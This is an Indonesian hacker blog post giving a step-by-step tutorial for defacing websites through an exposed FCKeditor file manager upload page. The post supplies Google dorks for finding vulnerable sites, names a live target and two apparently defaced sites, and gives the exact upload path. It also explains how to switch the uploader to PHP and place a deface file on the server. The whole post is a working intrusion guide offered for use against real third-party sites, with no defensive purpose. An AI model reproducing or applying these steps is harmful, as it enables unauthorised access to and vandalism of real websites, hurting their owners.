UCI
Private Blog
System OS :Linux server.google.com 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

Deface dengan teknik Remote File Upload Vulnerability (RFUEV) Fahmi J rwxr-xr-x 0 09.08

Filename Deface dengan teknik Remote File Upload Vulnerability (RFUEV)
Permission rw-r--r--
Author Fahmi J
Date and Time 09.08
Label
Action
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
Live Target : http://imobiliariaresende.com/editor/editor/filemanager/browser/mcpuk/images/icons/32/

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.


2). Pilih salah satu website sebagai target.


3). Tampilan Webitenya nanti akan seperti ini.
http://prntscr.com/1ilcho

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html




6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.


8). Lalu klik Send it to the Server.


9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.


10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :
http://www.buraevo.ru/UserFiles/_____.html

http://imobiliariaresende.com/editor/images/__.html

Ingat ya nick ane Mr.Router87... 

Sumber : Cirebon Cyber 4rt

0 komentar:

Posting Komentar

 

Sh0uT0u7 © 2010 United Cyberspace of Indonesian